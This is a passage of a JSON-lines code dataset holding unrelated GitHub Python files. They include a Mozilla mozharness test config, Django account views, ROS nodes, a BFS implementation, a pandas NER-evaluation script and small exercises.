@QtCore.Slot()\n def run(self):\n res = None\n try:\n res = self.function(*self.args, **self.kwargs)\n except Exception:\n pass\n self.finished.emit(res)\n","repo_name":"rmallow/howdyCoder","sub_path":"howdyCoder/ui/util/genericWorker.py","file_name":"genericWorker.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"35841076382","text":"FUNCTIONS = [\"max\",\"min\",\"sum\",\"average\"]\n\ndef col_max(table, column):\n temp = []\n for record in table:\n temp.append(record[column])\n return max(temp)\n\ndef col_min(table, column):\n temp = []\n for record in table:\n temp.append(record[column])\n return min(temp)\n\ndef col_sum(table, column):\n temp = []\n for record in table:\n temp.append(record[column])\n return sum(temp)\n\ndef col_average(table, column):\n temp = []\n for record in table:\n temp.append(record[column])\n return sum(temp)/len(temp)\n\ndef aggregateHandler(column,aggregate,table):\n if aggregate == 'max':\n return col_max(table, column)\n elif aggregate == 'min':\n return col_min(table, column)\n elif aggregate == 'sum':\n return col_sum(table, column)\n elif aggregate == 'average':\n return col_average(table, column)\n","repo_name":"PrajwalKrishna/Mini-sql-engine","sub_path":"src/aggregateFunctions.py","file_name":"aggregateFunctions.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"6730542140","text":"import os\nimport sys\n\n# OS Specifics\nABS_WORK_DIR = os.path.join(os.getcwd(), \"build\")\nBINARY_PATH = os.path.join(ABS_WORK_DIR, \"firefox\", \"firefox.exe\")\nINSTALLER_PATH = os.path.join(ABS_WORK_DIR, \"installer.zip\")\nXPCSHELL_NAME = 'xpcshell.exe'\nEXE_SUFFIX = '.exe'\nDISABLE_SCREEN_SAVER = False\nADJUST_MOUSE_AND_SCREEN = True\n#####\nconfig = {\n \"buildbot_json_path\": \"buildprops.json\",\n \"exes\": {\n 'python': sys.executable,\n 'virtualenv': [sys.executable, 'c:/mozilla-build/buildbotve/virtualenv.py'],\n 'hg': 'c:/mozilla-build/hg/hg',\n 'mozinstall': ['%s/build/venv/scripts/python' % os.getcwd(),\n '%s/build/venv/scripts/mozinstall-script.py' % os.getcwd()],\n 'tooltool.py': [sys.executable, 'C:/mozilla-build/tooltool.py'],\n },\n ###\n \"installer_path\": INSTALLER_PATH,\n \"binary_path\": BINARY_PATH,\n \"xpcshell_name\": XPCSHELL_NAME,\n \"virtualenv_path\": 'venv',\n \"virtualenv_python_dll\": os.path.join(os.path.dirname(sys.executable), \"python27.dll\"),\n \"find_links\": [\n \"http://pypi.pvt.build.mozilla.org/pub\",\n \"http://pypi.pub.build.mozilla.org/pub\",\n ],\n \"pip_index\": False,\n \"exe_suffix\": EXE_SUFFIX,\n \"run_file_names\": {\n \"mochitest\": \"runtests.py\",\n \"webapprt\": \"runtests.py\",\n \"reftest\": \"runreftest.py\",\n \"xpcshell\": \"runxpcshelltests.py\",\n \"cppunittest\": \"runcppunittests.py\",\n \"jittest\": \"jit_test.py\",\n \"mozbase\": \"test.py\",\n \"mozmill\": \"runtestlist.py\",\n },\n \"minimum_tests_zip_dirs\": [\"bin/*\", \"certs/*\", \"modules/*\", \"mozbase/*\", \"config/*\"],\n \"specific_tests_zip_dirs\": {\n \"mochitest\": [\"mochitest/*\"],\n \"webapprt\": [\"mochitest/*\"],\n \"reftest\": [\"reftest/*\", \"jsreftest/*\"],\n \"xpcshell\": [\"xpcshell/*\"],\n \"cppunittest\": [\"cppunittest/*\"],\n \"jittest\": [\"jit-test/*\"],\n \"mozbase\": [\"mozbase/*\"],\n \"mozmill\": [\"mozmill/*\"],\n },\n # test harness options are located in the gecko tree\n \"in_tree_config\": \"config/mozharness/windows_config.py\",\n # local mochi suites\n \"all_mochitest_suites\":\n {\n \"plain1\": [\"--total-chunks=5\", \"--this-chunk=1\", \"--chunk-by-dir=4\"],\n \"plain2\": [\"--total-chunks=5\", \"--this-chunk=2\", \"--chunk-by-dir=4\"],\n \"plain3\": [\"--total-chunks=5\", \"--this-chunk=3\", \"--chunk-by-dir=4\"],\n \"plain4\": [\"--total-chunks=5\", \"--this-chunk=4\", \"--chunk-by-dir=4\"],\n \"plain5\": [\"--total-chunks=5\", \"--this-chunk=5\", \"--chunk-by-dir=4\"],\n \"plain\": [],\n \"plain-chunked\": [\"--chunk-by-dir=4\"],\n \"mochitest-push\": [\"--subsuite=push\"],\n \"chrome\": [\"--chrome\"],\n \"browser-chrome\": [\"--browser-chrome\"],\n \"browser-chrome-chunked\": [\"--browser-chrome\", \"--chunk-by-runtime\"],\n \"mochitest-gl\": [\"--subsuite=webgl\"],\n \"mochitest-devtools-chrome\": [\"--browser-chrome\", \"--subsuite=devtools\"],\n \"mochitest-devtools-chrome-chunked\": [\"--browser-chrome\", \"--subsuite=devtools\", \"--chunk-by-runtime\"],\n \"mochitest-metro-chrome\": [\"--browser-chrome\", \"--metro-immersive\"],\n \"jetpack-package\": [\"--jetpack-package\"],\n \"jetpack-addon\": [\"--jetpack-addon\"],\n \"a11y\": [\"--a11y\"],\n \"plugins\": ['--setpref=dom.ipc.plugins.enabled=false',\n '--setpref=dom.ipc.plugins.enabled.x86_64=false',\n '--ipcplugins']\n },\n # local webapprt suites\n \"all_webapprt_suites\": {\n \"chrome\": [\"--webapprt-chrome\", \"--browser-arg=-test-mode\"],\n \"content\": [\"--webapprt-content\"]\n },\n # local reftest suites\n \"all_reftest_suites\": {\n \"reftest\": [\"tests/reftest/tests/layout/reftests/reftest.list\"],\n \"crashtest\": [\"tests/reftest/tests/testing/crashtest/crashtests.list\"],\n \"jsreftest\": [\"--extra-profile-file=tests/jsreftest/tests/user.js\", \"tests/jsreftest/tests/jstests.list\"],\n \"reftest-ipc\": ['--setpref=browser.tabs.remote=true',\n '--setpref=browser.tabs.remote.autostart=true',\n '--setpref=layers.async-pan-zoom.enabled=true',\n 'tests/reftest/tests/layout/reftests/reftest-sanity/reftest.list'],\n \"reftest-no-accel\": [\"--setpref=gfx.direct2d.disabled=true\", \"--setpref=layers.acceleration.disabled=true\",\n \"tests/reftest/tests/layout/reftests/reftest.list\"],\n \"reftest-omtc\": [\"--setpref=layers.offmainthreadcomposition.enabled=true\",\n \"tests/reftest/tests/layout/reftests/reftest.list\"],\n \"crashtest-ipc\": ['--setpref=browser.tabs.remote=true',\n '--setpref=browser.tabs.remote.autostart=true',\n '--setpref=layers.async-pan-zoom.enabled=true',\n 'tests/reftest/tests/testing/crashtest/crashtests.list'],\n },\n \"all_xpcshell_suites\": {\n \"xpcshell\": [\"--manifest=tests/xpcshell/tests/all-test-dirs.list\",\n \"%(abs_app_dir)s/\" + XPCSHELL_NAME]\n },\n \"all_cppunittest_suites\": {\n \"cppunittest\": ['tests/cppunittest']\n },\n \"all_jittest_suites\": {\n \"jittest\": []\n },\n \"all_mozbase_suites\": {\n \"mozbase\": []\n },\n \"run_cmd_checks_enabled\": True,\n \"preflight_run_cmd_suites\": [\n # NOTE 'enabled' is only here while we have unconsolidated configs\n {\n \"name\": \"disable_screen_saver\",\n \"cmd\": [\"xset\", \"s\", \"off\", \"s\", \"reset\"],\n \"architectures\": [\"32bit\", \"64bit\"],\n \"halt_on_failure\": False,\n \"enabled\": DISABLE_SCREEN_SAVER\n },\n {\n \"name\": \"run mouse & screen adjustment script\",\n \"cmd\": [\n # when configs are consolidated this python path will only show\n # for windows.\n sys.executable,\n \"../scripts/external_tools/mouse_and_screen_resolution.py\",\n \"--configuration-url\",\n \"https://hg.mozilla.org/%(repo_path)s/raw-file/%(revision)s/\" +\n \"testing/machine-configuration.json\"],\n \"architectures\": [\"32bit\"],\n \"halt_on_failure\": True,\n \"enabled\": ADJUST_MOUSE_AND_SCREEN\n },\n ],\n \"vcs_output_timeout\": 1000,\n \"minidump_save_path\": \"%(abs_work_dir)s/../minidumps\",\n \"buildbot_max_log_size\": 52428800,\n \"default_blob_upload_servers\": [\n \"https://blobupload.elasticbeanstalk.com\",\n ],\n \"blob_uploader_auth_file\": os.path.join(os.getcwd(), \"oauth.txt\"),\n \"download_minidump_stackwalk\": True,\n \"minidump_stackwalk_path\": \"win32-minidump_stackwalk.exe\",\n \"minidump_tooltool_manifest_path\": \"config/tooltool-manifests/win32/releng.manifest\",\n}\n","repo_name":"wicknix/AF-OSX-PPC","sub_path":"testing/mozharness/configs/unittests/win_unittest.py","file_name":"win_unittest.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"30"} +{"seq_id":"19357843303","text":"__all__ = ()\n\nfrom .fields import (\n put_owner_id_into, put_owner_into, put_owner_type_into, put_sku_id_into, validate_owner, validate_owner_id,\n validate_owner_type, validate_sku_id\n)\n\n\nENTITLEMENT_FIELD_CONVERTERS = {\n 'owner': (validate_owner, put_owner_into),\n 'owner_id': (validate_owner_id, put_owner_id_into),\n 'owner_type': (validate_owner_type, put_owner_type_into),\n 'sku': (validate_sku_id, put_sku_id_into),\n 'sku_id': (validate_sku_id, put_sku_id_into),\n}\n\n","repo_name":"HuyaneMatsu/hata","sub_path":"hata/discord/application/entitlement/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"30"} +{"seq_id":"35597012838","text":"nums = []\nevenNums = []\noddNums = []\noption = None\n\nwhile option != \"N\":\n num = int(input(f\"=> Type any integer number: \"))\n nums.append(num)\n \n option = input(f\"=> Do you want to continue? [Y/N] \").upper()\n print(f\"-\" * 45)\n \nfor num in nums:\n if num % 2 == 0:\n evenNums.append(num)\n else:\n oddNums.append(num)\n \nprint(f\"=> The whole list is: {nums}\")\nprint(f\"=> The list with even numbers is: {evenNums}\")\nprint(f\"=> The list with odd numbers is: {oddNums}\")","repo_name":"paulogosik/python","sub_path":"Curso em Vídeo - Mundo 3/Exercicios/ex82.py","file_name":"ex82.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"30"} +{"seq_id":"3425503230","text":"from django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm, BaseUserCreationForm, PasswordChangeForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import CreateView\n\nfrom .forms import LoginForm, UserRegistrationForm, UserEditForm, ProfileEditForm, PasswordChangingForm, \\\n ProfileAdminForm\nfrom .models import Profile\n\n\n# Create your views here.\ndef loginview(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n # print(form)\n if form.is_valid():\n # print(form)\n data = form.cleaned_data\n user = authenticate(\n request, username=data['username'], password=data['password'])\n # print(user.username)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('index_view')\n else:\n form = LoginForm()\n return render(request, 'registration/login.html', {'form': form})\n\n\ndef logoutview(request):\n if request.method == 'POST':\n logout(request)\n return redirect('registration/login.html')\n\n return render(request, 'registration/logged_out.html', {})\n\n\n@login_required\ndef user_profile(request):\n user = request.user\n profile = Profile.objects.get(user=user)\n context = {\n 'user': user,\n 'profile': profile\n }\n return render(request, 'profile/profile.html', context)\n\n\nfrom .models import Profile\ndef user_register(request):\n if request.method == \"POST\":\n user_form = UserRegistrationForm(request.POST)\n profile_form = ProfileAdminForm(request.POST, request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n new_user = user_form.save(commit=False)\n new_user.set_password(user_form.cleaned_data['password'])\n new_user.save()\n context = {\n 'new_user':new_user\n }\n return render(request, 'account/register_done.html', context)\n else:\n return HttpResponse('This username is already taken.')\n else:\n user_form = UserRegistrationForm()\n profile = ProfileAdminForm()\n context = {\n 'user_form': user_form,\n 'profile': profile\n }\n return render(request, 'account/register.html', context)\nclass SignUpView(CreateView):\n form_class = UserCreationForm\n success_url = reverse_lazy('login')\n template_name = 'account/register.html'\n\n\n@login_required\ndef edit_user(request):\n if request.method == 'POST':\n user_form = UserEditForm(instance=request.user, data=request.POST)\n profile_form = ProfileEditForm(\n instance=request.user.profile, data=request.POST, files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n else:\n return render(request, 'account/profile_edit.html', {'user_form': user_form, 'profile_form': profile_form})\n else:\n user_form = UserEditForm(instance=request.user)\n profile_form = ProfileEditForm(instance=request.user.profile)\n return render(request, 'account/profile_edit.html', {'user_form': user_form, 'profile_form': profile_form})\n\n\nclass EditUserView(LoginRequiredMixin, View):\n\n def get(self, request):\n user_form = UserEditForm(instance=request.user)\n profile_form = ProfileEditForm(instance=request.user.profile)\n\n return render(request, 'account/profile_edit.html', {'user_form': user_form, 'profile_form': profile_form})\n\n def post(self, request):\n if request.method == 'POST':\n user_form = UserEditForm(instance=request.user, data=request.POST)\n profile_form = ProfileEditForm(\n instance=request.user.profile, data=request.POST, files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n return redirect('profile')\n","repo_name":"Adhamov88/Newswebsite","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"27474912756","text":"from collections import deque\nclass Graph:\n def __init__(self,G):\n self.adjList = [x[:] for x in G]\n self.numV = len(G)\n\n def bfsutil(self,start):\n self.distance[start] = 0\n self.color[start] = 1\n q = deque()\n q.append(start)\n while len(q) > 0:\n n = q.popleft()\n for v in self.adjList[n]:\n if self.color[v] is False:\n q.append(v)\n self.color[v] = True\n self.parent[v] = n\n self.distance[v] = self.distance[n] + 1\n print(\"Current node \", n, \" distance : \", self.distance[n])\n\n\n def bfs(self,start):\n self.color = [False for x in range(self.numV)]\n self.distance = [10 for x in range(self.numV)]\n self.parent = [None for x in range(self.numV)]\n self.bfsutil(start)\n\ndef main():\n ''' Adjacency List representation. G is a list of lists. '''\n G = [] \n\n file=open('input.txt','r')\n for line in file:\n line=line.strip()\n adjacentVertices = []\n first=True\n for node in line.split(' '):\n if first:\n first=False\n continue\n adjacentVertices.append(int(node))\n G.append(adjacentVertices)\n\n file.close()\n\n s = int(input(\"Enter the source \"))\n graph = Graph(G)\n graph.bfs(s) \n\nif __name__ == '__main__':\n\n main()","repo_name":"harshagrwl/4th-Semester-Labs","sub_path":"DSA/Lab3/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"39212351323","text":"#! /usr/bin/env python3\n\n######################################################\n# Name: Hany Ali Elesawy\n# Date: 2022.09.08\n# Topic: ROS2Lab day 07\n#\n##########################\n#\n# node1 (str_publisher) tasks:\n#\n# \tpublish \"str_topic\" --> (“ is publish <,>”) and update the counter every 1 second\n#\tsubscribe to \"reset_flag\"\n#\n##########################\n# \n# node2 (\"number_counter\") tasks:\n#\n#\tsubscribe to \"str_topic\"\n#\tpublish \"reset_flag\" --> is set to True when the counter from node1 reaches a value of 5\n#\n######################################################\n\n\nimport rclpy\nfrom rclpy.node import Node\n\nfrom std_msgs.msg import String\n\nfrom std_msgs.msg import Bool\n\nclass my_node1(Node):\n\t\n\tdef __init__(self):\n\t\tsuper().__init__(\"str_publisher\")\n\t\t\n\t\tself.counter = 0\n\t\tself.Globalcounter = 0\n\t\ttimer_period = 1\n\t\t\n\t\t\n\t\tself.create_timer(timer_period, self.timerCallback)\n\t\t\n\t\tself.pub = self.create_publisher(String, \"str_topic\", 10)\n\n\t\tself.sub = self.create_subscription(Bool, \"reset_flag\", self.node1_SubCallback,10)\n\t\t\n\t\t\n\tdef timerCallback(self):\n\t\t\n\t\tstr_msg = String()\n\t\t\n\t\tstr_msg.data = f\"Hany Elesawy is publishing... , {self.counter}\"\n\t\tself.pub.publish(str_msg)\n\t\t\n\t\tprint(f\"Node 1 publish tick {self.Globalcounter}\")\n\t\t\n\t\tself.counter += 1\n\t\tself.Globalcounter += 1\n\t\t\n\t\t\n\tdef node1_SubCallback(self, msg):\n\t\t\n\t\tif msg.data == True: \t\t\t\t\t#if resetflag == true --> reset \n\t\t\tself.counter = 0\n\t\t\n\t\t\ndef main(args=None):\n\n\trclpy.init(args=args)\n\t\n\tnode1 = my_node1()\n\t\t\n\trclpy.spin(node1)\n\n\trclpy.shutdown()\n\t\t\nif __name__ == \"__main__\":\n\tmain()\n\t\t\n","repo_name":"H3EsAwY/ITI_Robotics_Course2022","sub_path":"Day_07/ITI_Lab_Day_07/ITI_Lab_Day_07/node1.py","file_name":"node1.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"13531591134","text":"# operation system\nimport os\n# regular expression\nimport re\n# retrives file support\nimport glob\n# make a table\nimport pandas as pd\n# regular expression\nimport re\n\n#function to compare columns NE-COARSE-LIT x GOLD\ndef compare(x): \n\treturn '1' if x['PREDICTION'] == x['GOLD'] else 'O'\n\n# input directory\npath_hand = r'/Users/alexsoares/Desktop/EHESS/dev/Savoirs_Spacy/hand_pandas' # use your path\npath_clean = r'/Users/alexsoares/Desktop/EHESS/dev/Savoirs_Spacy/SpaCy_BIO/SpaCy_sm_BIO/' \n\n# inform the path\nfor file_path in glob.iglob(path_hand + \"/*.txt\"):\n\t#transform path into a readable file\n\tf_hand = file_path\n\t\n\t# open the variable to be read and split into words\n\twith open(f_hand, 'r', encoding='utf8') as f:\n\t\tt_hand = f.read()\n\t\tfor f_path in glob.iglob(path_clean + \"/*.txt\"):\n\t\t\t\n\t\t\t#transform path into a readable file\n\t\t\tf_clean = f_path\n\t\t\tf_clean_part = os.path.basename(f_clean.replace(\"_text_SpaCy_sm_BIO.txt\", \"\"))\n\t\t\tf_hand_part = os.path.basename(f_hand.replace(\"_text_beyond_hand_BIO.txt\", \"\"))\n\t\t\tif (f_clean_part == f_hand_part):\n\t\t\t\t#print(f_clean_part)\n\t\t\t\t#print(f_hand_part)\n\t\t\t\t\n\t\t\t\t# open the variable to be read and split into words\n\t\t\t\twith open(f_clean, 'r', encoding='utf8') as f_BIO:\n\t\t\t\t\t# read and split into words to count word in file\n\t\t\t\t\tt_clean = f_BIO.read()\n\t\t\t\t\t#print(t_clean) \t\t\t\t\n\t\t\t\t\t#### PANDAS ####\n\t\t\t\t\tdf_hand = pd.read_csv(f_hand, sep=\"\\t\", names=[\"TOK\"])\n\t\t\t\t\t#print(df_hand)\n\t\t\t\t\tdf_clean = pd.read_csv(f_clean, sep=\"\\t\", names=[\"TOKEN\", \"PREDICTION\", \"GOLD\", \"VALIDITY\"])\n\t\t\t\t\t#print(df_clean)\n\t\t\t\t\t# convert the dictionary into DataFrame\n\t\t\t\t\ttable_clean = pd.DataFrame(df_clean)\n\t\t\t\t\t#print(table_clean)\n\t\t\t\t\ttable_hand = pd.DataFrame(df_hand)\n\t\t\t\t\t#print(table_hand)\n\t\t\t\t\t# split the column TOK in two GOLD with the IOB format and TOK_ with the tokenized text\n\t\t\t\t\ttable_hand[['TOK_','GOLD_bio']] = table_hand.TOK.str.split(\" \",expand=True,)\n\t\t\t\t\t#df['columnF'] = pd.Series(df1['columnF'])\n\t\t\t\t\ttable_clean['GOLD']=pd.Series(table_hand['GOLD_bio'])\n\t\t\t\t\t# delete the index\n\t\t\t\t\tblankIndex=[''] * len(table_clean)\n\t\t\t\t\ttable_clean.index=blankIndex\n\t\t\t\t\t\n\t\t\t\t\t# delete the column from TABLE_HAND previews columns\n\t\t\t\t\tdel table_hand ['TOK']\n\t\t\t\t\tdel table_hand ['TOK_']\n\t\t\t\t\t\n\t\t\t\t\t# it allows to display entire table\n\t\t\t\t\tpd.set_option(\"display.max_rows\", None, \"display.max_columns\", None )\n\t\t\t\t\ttable_clean['VALIDITY'] = table_clean.apply(compare, axis=1)\n\n\t\t\t\t\t#print(table_clean)\n\t\t\t\t\t\n\t\t\t\t\t# directory out\n\t\t\t\t\toutput_dir = \"/Users/alexsoares/Desktop/EHESS/dev/Savoirs_Spacy/db_results/SpaCy_prediction/prediction_sm/\"\n\t\t\t\t\t# new files out with original's name plus _text and its new format .txt\n\t\t\t\t\tresults_file = \"%s%s_prediction.tsv\"%(output_dir, os.path.splitext(os.path.basename(f_clean))[0])\n\t\t\t\t\tprint(results_file)\n\t\t\t\t\t\n\t\t\t\t\t# write to files\n\t\t\t\t\twith open(results_file,'w') as write_csv:\n\t\t\t\t\t\twrite_csv.write(table_clean.to_csv(sep='\\t', index=False))\n\t\t\t\t\t#print(write_csv)\n\t\t\t\t\t\t\n\n\t\t\t\t\t\n\n\t\t\t\t\t\n\n\t\t\t\t\t\n","repo_name":"PSIG-EHESS/SavoirsEN","sub_path":"ScriptPython/SpaCY_prediction_.py","file_name":"SpaCY_prediction_.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"6416594844","text":"#!/usr/bin/env python\r\n# Software License Agreement (BSD License)\r\n#\r\n# Copyright (c) 2016, HLP-R\r\n# All rights reserved.\r\n#\r\n# Redistribution and use in source and binary forms, with or without\r\n# modification, are permitted provided that the following conditions\r\n# are met:\r\n#\r\n# * Redistributions of source code must retain the above copyright\r\n# notice, this list of conditions and the following disclaimer.\r\n# * Redistributions in binary form must reproduce the above\r\n# copyright notice, this list of conditions and the following\r\n# disclaimer in the documentation and/or other materials provided\r\n# with the distribution.\r\n# * Neither the name of Willow Garage, Inc. nor the names of its\r\n# contributors may be used to endorse or promote products derived\r\n# from this software without specific prior written permission.\r\n#\r\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\r\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\r\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\r\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\r\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\r\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\r\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\r\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\r\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\r\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\r\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\r\n# POSSIBILITY OF SUCH DAMAGE.\r\n#\r\n# A script to use pocketsphinx's \"keyphrase spotting\" feature with \r\n# python and ros. Note that it\r\n#\r\n# Authors: Baris Akgun, Priyanka Khante\r\n# Edited: Vivian Chu, 8-29-16 - rosparam and multiple yaml files\r\n#\r\n# A convenience class to map speech recognition result to commands \r\n# while keeping the time stamp.\r\n#\r\n# Note that currently the mapping is done by hand\r\n\r\nimport rospy\r\nimport rosgraph\r\nimport rospkg\r\nimport socket\r\nimport yaml\r\nfrom std_msgs.msg import String\r\nfrom hlpr_speech_msgs.msg import StampedString, SpeechCommand\r\nfrom hlpr_speech_msgs.srv import SpeechService\r\n\r\nclass SpeechListener:\r\n\r\n COMMAND_TOPIC_PARAM = \"/speech/publish_topic\"\r\n SERVICE_TOPIC_PARAM = \"/speech/service_topic\"\r\n KEYWORDS_PARAM = \"/speech/keywords\"\r\n COMMAND_TYPE = \"/speech/command_type\"\r\n LEAVE_COMMAND = \"/speech/leave_command\"\r\n\r\n def __init__(self, commandBuffSize=10, init_node=True):\r\n\r\n if (init_node):\r\n # initialize the ros node\r\n rospy.init_node(\"speech_listener\")\r\n \r\n # Default values for speech listener\r\n rospack = rospkg.RosPack()\r\n default_pub_topic = 'hlpr_speech_commands'\r\n default_yaml_files = [rospack.get_path('hlpr_speech_recognition')+'/data/kps.yaml']\r\n default_service_topic = 'get_last_speech_cmd'\r\n\r\n # Pull values from rosparam\r\n self.recog_topic = rospy.get_param(SpeechListener.COMMAND_TOPIC_PARAM, default_pub_topic)\r\n self.yaml_files = rospy.get_param(\"~yaml_list\", default_yaml_files)\r\n self.service_topic = rospy.get_param(SpeechListener.SERVICE_TOPIC_PARAM, default_service_topic)\r\n self.msg_type = eval(rospy.get_param(SpeechListener.COMMAND_TYPE, 'StampedString')) # True if message is only str, false includes header\r\n self.leave_command_flag = rospy.get_param(SpeechListener.LEAVE_COMMAND, False) #do we care if we the last command is old\r\n\r\n rospy.Subscriber(self.recog_topic, self.msg_type, self.callback)\r\n\r\n # Converts the yaml files into keywords to store into the dictionary\r\n self.keywords_to_commands = {}\r\n for kps_path in self.yaml_files:\r\n for data in yaml.load_all(file(kps_path,'r')):\r\n self.keywords_to_commands[str(data['tag'])] = data['speech']\r\n\r\n # Store this on the rosparam server now\r\n rospy.set_param(SpeechListener.KEYWORDS_PARAM, self.keywords_to_commands)\r\n\r\n self._commandBuffSize = commandBuffSize\r\n #self.commandsQueue = deque(maxlen=self._commandBuffSize)\r\n\r\n # Flags for starting/stopping the node\r\n self.spinning = False\r\n self.last_command_fresh = False\r\n self.last_command = None\r\n self.last_ts = None\r\n self.last_string = None\r\n\r\n # Setup service call\r\n s = rospy.Service(self.service_topic, SpeechService, self.get_last_command)\r\n rospy.loginfo(\"Speech listener initialized\")\r\n\r\n # The following function is called each time, for every message\r\n def callback(self, msg):\r\n\r\n if self.msg_type == StampedString:\r\n self.last_string = msg.keyphrase\r\n self.last_ts = msg.stamp\r\n else:\r\n self.last_string = msg.data\r\n\r\n self.last_command = self._map_keyword_to_command(self.last_string)\r\n self.last_command_fresh = True\r\n if self.spinning:\r\n rospy.loginfo(rospy.get_caller_id() + ' I heard %s', str(self.last_command))\r\n\r\n # method to extract command string from msg\r\n def _map_keyword_to_command(self, data):\r\n for (command, keywords) in self.keywords_to_commands.iteritems():\r\n for word in keywords:\r\n if data.find(word) > -1:\r\n return command\r\n\r\n # This is now made a service call\r\n def get_last_command(self, req=None):\r\n\r\n # Check if we care how \"recent\" the command was\r\n if not self.leave_command_flag:\r\n\r\n # returns a service request error\r\n if not self.last_command_fresh:\r\n return None\r\n\r\n # The command hasn't been ask for before\r\n self.last_command_fresh = False\r\n if (req): \r\n return {'speech_cmd': self.last_command}\r\n else:\r\n return self.last_command\r\n\r\n def get_last_string(self):\r\n return self.last_string\r\n\r\n def get_last_ts(self):\r\n return self.last_ts\r\n \r\n # clears commands queue\r\n def cleanup(self):\r\n #commandsQueue.clear()\r\n pass\r\n\r\n def spin(self):\r\n self.spinning = True\r\n # if shutdown, need to clean up the commands queue\r\n rospy.on_shutdown(self.cleanup)\r\n rospy.spin()\r\n\r\ndef listener():\r\n sl = SpeechListener()\r\n sl.spin() \r\n\r\nif __name__ == '__main__':\r\n listener()\r\n \r\n","repo_name":"HLP-R/hlpr_speech","sub_path":"hlpr_speech_recognition/src/hlpr_speech_recognition/speech_listener.py","file_name":"speech_listener.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"30"} +{"seq_id":"34225338712","text":"# 직각삼각형\n\n# import math\n#\n# while True:\n# a, b, c = list(map(int, input().split()))\n#\n# if a == 0 and b == 0 and c == 0:\n# break\n# else:\n# if c == math.sqrt(a**2 + b**2):\n# print('right')\n# elif c != math.sqrt(a**2 + b**2):\n# print('wrong')\n\nwhile True:\n a, b, c = map(int, input().split())\n line = []\n line.append(a)\n line.append(b)\n line.append(c)\n if a == 0 and b == 0 and c == 0:\n break\n else:\n maximum = max(line)\n line.remove(maximum)\n\n if pow(maximum, 2) == pow(line[0], 2) + pow(line[1], 2):\n print('right')\n else:\n print('wrong')\n","repo_name":"par3k/Algorithm-Codingtest","sub_path":"BOJ_Python/4153.py","file_name":"4153.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"} +{"seq_id":"26718882953","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n@author : zuti\r\n@software : PyCharm\r\n@file : test_JSBSIM.py\r\n@time : 17/06/2023 23:51\r\n@desc :\r\n\r\n\"\"\"\r\nimport numpy as np\r\n\r\nfrom envs.JsbSimEnv.JsbSimEnv import EnvCore\r\n\r\nenv = EnvCore()\r\nfor t in env.state_before:\r\n print(f'{t}')\r\n\r\n\r\n\r\naction_0 = np.array([0,0,0,0])\r\naction_1 = [0,0,0,0]\r\naction = [action_0,action_1]\r\n\r\nfor i in range(100):\r\n [sub_agent_obs, sub_agent_reward, sub_agent_done, sub_agent_info] =env.step(action)\r\n print(f'obs{sub_agent_obs}')\r\n print(sub_agent_reward)\r\n\r\n","repo_name":"zuti666/MARL","sub_path":"test/testJsbsim/test_JSBSIM.py","file_name":"test_JSBSIM.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"30"} +{"seq_id":"37057142064","text":"alp={'A':1,'B':2,'C':3,'D':4,'E':5,'F':6,'G':7,'H':8,'I':9,'J':10,'K':11,'L':12,'M':13,'N':14,'O':15,'P':16,'Q':17,'R':18,'S':19,'T':20,'U':21,'V':22,'W':23,'X':24,'Y':25,'Z':26}\ndef get_names():\n parts=[]\n f = open('text.txt')\n line 